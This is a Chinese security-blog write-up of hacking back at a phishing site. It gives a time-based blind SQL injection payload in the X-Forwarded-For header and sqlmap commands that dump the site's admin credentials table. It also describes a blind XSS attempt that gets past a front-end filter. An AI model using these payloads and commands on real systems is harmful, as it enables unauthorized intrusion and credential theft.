记一次对钓鱼网站的XFF头注入

2020-03-16 11,331

本文由内部学员:YuChen投稿


事情还得从一个群说起,某穿越火线女主播粉丝群

群友发了个钓鱼网站

 打开是这样的


信息收集一波


不过这个人好像是批量注册的


看下中间件信息


IP和端口开放情况

nmap再扫一扫看看


除了80

5555端口没响应

10010端口403

对10010进行目录扫描 未果

 

对网站目录扫描:

看样子是宝塔+Linux

收集完了开搞


登录框想到了注入

 

Burp抓包

post的参数和UA进行fuzz时没什么发现


以前看过钓鱼的源码

想到了钓鱼网站可能会记录ip

尝试XFF头注入

可能有注入 盲注试试

X-Forwarded-For:'and (select 1 from(select(sleep(2)))x)#

保存请求包为a.txt

sqlmap.py -r C:a.txt --batch --level 4
sqlmap.py -r "C:a.txt" --batch--level 4 -D sql_2020sy_gbzp_ -T yunx_admin -C username,password --dump

拿到了用户名,密码


但是找不到后台


所以用XSS盲打试试


在输入账号密码处插入xss payload:

Emmm 插不进去

可能是前端限制 检查一下


发现了ts这个函数

找到js的这个函数 验证了是前端限制的想法


Burp抓包后插入XSS

等待结果。


写脚本看看同ip的其他站点

 运行结果

都点开后都是这个样子域名过期的,没有绑定域名的

最后,sqlmap可以获取sql-shell权限

今天才刚刚搭建,已经有21条数据记录了


Emm  我裂开,暂无后续,我太难了。


点赞,转发,在看


XFF头注入推荐阅读


https://www.cnblogs.com/soldierback/p/11707035.html


本文作者:HACK_Learn

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/125710.html

Tags:
评论  (1)
快来写下你的想法吧!
  • A 2020-03-17 11:38:30

    同样是找不到后台,如果有什么找的到后台的方法 麻烦分享一下[em_51]

HACK_Learn

文章数:142 积分: 323

微信公众号:HACK学习呀

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号